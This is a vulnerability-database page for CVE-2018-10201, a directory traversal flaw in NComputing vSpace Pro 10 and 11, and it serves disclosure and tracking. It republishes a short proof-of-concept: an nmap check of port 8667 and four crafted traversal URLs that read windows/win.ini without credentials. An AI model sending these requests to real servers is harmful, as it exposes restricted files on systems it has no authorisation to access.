Vulners
Lucene search
Ncomputing vSpace Pro 10/11 - Directory Traversal
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | Ncomputing vSpace Pro v10 and v11 - Directory Traversal PoC | 23 Apr 201800:00 | – | zdt |
 | NComputing vSpace Pro NC Monitor Server Directory Traversal Vulnerability | 24 Apr 201800:00 | – | cnvd |
 | CVE-2018-10201 | 20 Apr 201808:00 | – | cve |
 | CVE-2018-10201 | 20 Apr 201808:00 | – | cvelist |
 | Ncomputing vSpace Pro 1011 - Directory Traversal | 23 Apr 201800:00 | – | exploitpack |
 | Ncomputing vSPace Pro 10 and 11 - Directory Traversal | 4 Jun 202603:48 | – | nuclei |
 | CVE-2018-10201 | 20 Apr 201808:29 | – | nvd |
 | Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas |
 | CVE-2018-10201 | 20 Apr 201808:29 | – | osv |
 | Ncomputing vSPace Pro 10 / 11 Directory Traversal | 23 Apr 201800:00 | – | packetstorm |
10
# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# Contact: [email protected]
# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps
#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with …/ or …\ or …./ or ….\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.
#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp open unknown
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.iniData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Apr 2018 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.81415